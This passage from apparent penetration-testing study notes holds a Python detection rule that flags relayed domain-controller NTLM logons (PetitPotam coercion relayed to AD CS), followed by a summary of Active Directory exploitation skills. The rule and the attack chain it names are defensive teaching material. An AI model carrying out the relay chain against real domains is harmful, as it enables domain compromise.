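A triage rule for the relay shown above, as seen from the CA host: the coerced DC authentication reaches the CA as a 4624 for ACADEMY-EA-DC01$ from the relay box rather than from the DC. This is an added example for these notes (not the module's, Impacket's or PetitPotam's code); the 4624 field names are real, while the expected-address table and the sample events are assumptions.

```python
"""Spot a relayed machine-account logon on the AD CS web enrollment host.

Added example for these notes, not code from the HTB module, Impacket or
PetitPotam. When the DC's coerced NTLM authentication is relayed to the CA,
the CA's Security log records a 4624 (network logon) for ACADEMY-EA-DC01$
whose IpAddress is the relay host (172.16.5.225 above), not the DC
(172.16.5.5). The WorkstationName field is copied from the original NTLM
message, so it is not a reliable signal; the source address is.
Assumptions: 4624 records are dicts keyed by EventData field names, and the
operator supplies the addresses each machine account is expected to come
from. The sample events are constructed.
"""

# Where each machine account that legitimately talks to the CA should come from.
MACHINE_ADDRESSES = {"ACADEMY-EA-DC01$": {"172.16.5.5"}}

SAMPLE_LOGONS = [
    # Relayed: the DC's account over NTLM, arriving from the attacker's relay host
    {"EventID": 4624, "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "TargetUserName": "ACADEMY-EA-DC01$", "TargetDomainName": "INLANEFREIGHT",
     "IpAddress": "172.16.5.225", "WorkstationName": "ACADEMY-EA-DC01"},
    # Benign: the DC itself, Kerberos, from its own address
    {"EventID": 4624, "LogonType": "3", "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "ACADEMY-EA-DC01$", "TargetDomainName": "INLANEFREIGHT",
     "IpAddress": "172.16.5.5", "WorkstationName": "-"},
    # Worth a look: NTLM instead of Kerberos, but from the expected address
    {"EventID": 4624, "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "TargetUserName": "ACADEMY-EA-DC01$", "TargetDomainName": "INLANEFREIGHT",
     "IpAddress": "172.16.5.5", "WorkstationName": "ACADEMY-EA-DC01"},
    # A user logon; this rule only looks at machine accounts
    {"EventID": 4624, "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "TargetUserName": "forend", "TargetDomainName": "INLANEFREIGHT",
     "IpAddress": "172.16.5.25", "WorkstationName": "ACADEMY-EA-MS01"},
]


def classify(event, machine_addresses=MACHINE_ADDRESSES):
    """Return (severity, rule, detail) for a suspicious 4624, else None."""
    if event.get("EventID") != 4624 or event.get("LogonType") != "3":
        return None
    account = event["TargetUserName"]
    if not account.endswith("$"):
        return None
    source = event["IpAddress"]
    uses_ntlm = event["AuthenticationPackageName"].upper() == "NTLM"
    expected = machine_addresses.get(account)
    if expected is None:
        return ("medium", "unknown-machine-account-logon", f"{account} from {source}")
    from_expected = source in expected
    if uses_ntlm and not from_expected:
        # NTLM plus a wrong source address is the relay signature
        # (MS-EFSRPC coercion -> ntlmrelayx -> CA web enrollment).
        return ("critical", "relayed-machine-account-ntlm-logon",
                f"{account} via NTLM from {source}, expected {sorted(expected)}")
    if uses_ntlm:
        return ("medium", "machine-account-ntlm-logon", f"{account} via NTLM from {source}")
    if not from_expected:
        return ("high", "machine-account-from-unexpected-address", f"{account} from {source}")
    return None


def triage(events, machine_addresses=MACHINE_ADDRESSES):
    """Return (account, severity, rule, detail) for every event classify() flags."""
    findings = []
    for event in events:
        verdict = classify(event, machine_addresses)
        if verdict is not None:
            findings.append((event["TargetUserName"],) + verdict)
    return findings


if __name__ == "__main__":
    for account, severity, rule, detail in triage(SAMPLE_LOGONS):
        print(f"[{severity}] {rule}: {detail}")
```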


📊 Key Takeaways

Technical Mastery Achieved

  1. Bleeding Edge Exploitation: Proficiency with latest AD attack vectors

  2. Multi-Vector Attacks: Understanding of various domain compromise paths

  3. Certificate Abuse: Advanced PKI and ADCS exploitation techniques

  4. Tool Proficiency: Mastery of NoPac, PrintNightmare, and PetitPotam tools

Professional Skills Developed

  • Rapid Adaptation: Ability to quickly implement new attack techniques

  • Risk Assessment: Understanding impact and exploitability of recent vulnerabilities

  • Client Communication: Effectively explaining cutting-edge threats to stakeholders

  • Patch Prioritization: Identifying critical vulnerabilities requiring immediate attention

Attack Methodology Mastery

Vulnerability Research → Tool Setup → Target Assessment → Exploitation → Domain Compromise
    (CVE Analysis)      (Environment)   (Scanning)       (Execution)    (Full Control)

Defensive Insights

  • Patch Management: Critical importance of timely security updates

  • Attack Surface Reduction: Disabling unnecessary services and features

  • Monitoring Requirements: Detection strategies for advanced persistent threats

  • Incident Response: Rapid containment procedures for domain compromise

🔑 This section runs from the theory behind bleeding edge Active Directory vulnerabilities, through practical exploitation, to their defensive implementation: the capabilities an enterprise penetration tester needs for the current threat landscape.

